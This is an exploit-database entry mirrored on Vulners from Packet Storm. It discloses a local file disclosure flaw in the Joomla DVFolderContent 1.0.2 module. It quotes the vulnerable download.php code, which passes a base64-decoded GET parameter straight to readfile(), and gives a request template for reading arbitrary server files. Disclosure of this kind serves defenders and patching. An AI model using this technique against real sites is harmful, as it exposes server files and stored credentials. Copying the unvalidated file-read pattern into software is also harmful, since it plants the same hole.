Lucene search
K

Joomla DVFolderContent 1.0.2 Local File Disclosure

🗓️ 01 Oct 2016 00:00:00Reported by Mojtaba MobhaMType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 41 Views

Joomla DVFolderContent V1.0.2 Local File Disclosure - Exploi

Code
`######################  
# Exploit Title : Joomla DVFolderContent V1.0.2 Module - Local File Disclosure  
# Exploit Author : Persian Hack Team  
# Vendor Homepage : http://www.dvextensions.de/en/extensions/dvfoldercontent  
# Category [ Webapps ]  
# Tested on [ Win ]  
# Version : V1.0.2  
# Date 2016/10/01  
######################  
  
PoC  
The Vulnerable page is  
/modules/mod_dvfoldercontent/download.php  
  
$file = base64_decode($_GET['f']);  
if (is_file($file)) {  
$fileinfo = pathinfo($file);  
$filename = $fileinfo['basename'];  
$filesize = filesize($file);  
header("Content-Type: application/octet-stream; name=$filename");  
header("Content-Disposition: attachment; filename=$filename");  
header("Content-Length: $filesize");  
header("Pragma: no-cache");  
readfile($file);  
  
Exploit:  
http://server/modules/mod_dvfoldercontent/download.php?f=base64   
  
Video : http://persian-team.ir/showthread.php?tid=165&pid=298  
######################  
# Discovered by : Mojtaba MobhaM   
# B3li3v3 M3 I will n3v3r St0p  
# Greetz : T3NZOG4N & FireKernel & Dr.Askarzade & Masood Ostad & Dr.Koorangi & Milad Hacking & JOK3R $ Mr_Mask_Black And All Persian Hack Team Members  
# Homepage : http://persian-team.ir  
######################  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation